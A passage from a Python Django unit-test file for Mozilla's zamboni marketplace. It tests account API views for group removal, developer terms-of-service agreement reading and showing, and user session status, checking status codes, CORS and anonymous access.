res.content)\n\n def test_remove_group_fail_admin(self):\n GroupUser.objects.create(group=self.restricted_group,\n user=self.target_user)\n res = self.do_delete(self.restricted_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_fail_not_member(self):\n res = self.do_delete(self.normal_group.pk)\n eq_(res.status_code, 400, res.content)\n\n def test_remove_group_fail_no_group(self):\n res = self.do_delete(123456)\n eq_(res.status_code, 
400, res.content)\n\n\nclass TestTOSReadView(RestOAuth):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n super(TestTOSReadView, self).setUp()\n self.url = reverse('api-v2:account-devagreement-read')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('post'))\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.url), 'post')\n\n def test_anon(self):\n res = self.anon.post(self.url)\n eq_(res.status_code, 403)\n\n def test_get(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 405)\n\n def test_already_signed(self):\n self.user.update(read_dev_agreement=datetime.now())\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n\n def test_sign_not_shown(self):\n self.user.update(read_dev_agreement=None, shown_dev_agreement=None)\n eq_(self.user.shown_dev_agreement, None)\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 400)\n\n def test_sign_shown(self):\n self.user.update(read_dev_agreement=None,\n shown_dev_agreement=datetime.now())\n ok_(isinstance(self.user.shown_dev_agreement, datetime))\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 201)\n updated_user = UserProfile.objects.get(pk=self.user.pk)\n ok_(isinstance(updated_user.shown_dev_agreement, datetime))\n ok_(isinstance(updated_user.read_dev_agreement, datetime))\n\n\nclass TestTOSShowView(RestOAuth):\n fixtures = fixture('user_2519')\n\n def setUp(self):\n super(TestTOSShowView, self).setUp()\n self.url = reverse('api-v2:account-devagreement-show')\n self.user = UserProfile.objects.get(pk=2519)\n\n def test_verbs(self):\n self._allowed_verbs(self.url, ('post'))\n\n def test_has_cors(self):\n self.assertCORS(self.client.post(self.url), 'post')\n\n def test_anon(self):\n res = self.anon.post(self.url)\n eq_(res.status_code, 403)\n\n def test_get(self):\n res = self.client.get(self.url)\n eq_(res.status_code, 405)\n\n def test_already_signed(self):\n now = datetime.now()\n self.user.update(shown_dev_agreement=now)\n res = self.client.post(self.url)\n eq_(res.status_code, 200)\n eq_(res.json['url'], reverse('mkt.developers.apps.terms_standalone'))\n\n def test_show_user(self):\n self.user.update(read_dev_agreement=None)\n eq_(self.user.read_dev_agreement, None)\n res = self.client.post(self.url)\n eq_(res.status_code, 201)\n updated_user = UserProfile.objects.get(pk=self.user.pk)\n ok_(isinstance(updated_user.shown_dev_agreement, datetime))\n eq_(res.json['url'], reverse('mkt.developers.apps.terms_standalone'))\n\n\nclass TestUserSessionView(TestCase):\n fixtures = fixture('user_999',)\n\n def setUp(self):\n super(TestUserSessionView, self).setUp()\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.url = reverse('users.session')\n\n def test_no_cors(self):\n response = self.client.get(self.url)\n assert 'Access-Control-Allow-Origin' not in response\n\n def test_no_session(self):\n response = self.client.get(self.url)\n eq_(response.status_code, 200)\n eq_(json.loads(response.content)['has_session'], False)\n\n def test_session(self):\n self.login(self.user.email)\n response = self.client.get(self.url)\n eq_(response.status_code, 200)\n eq_(json.loads(response.content)['has_session'], 
True)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/account/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":39654,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"}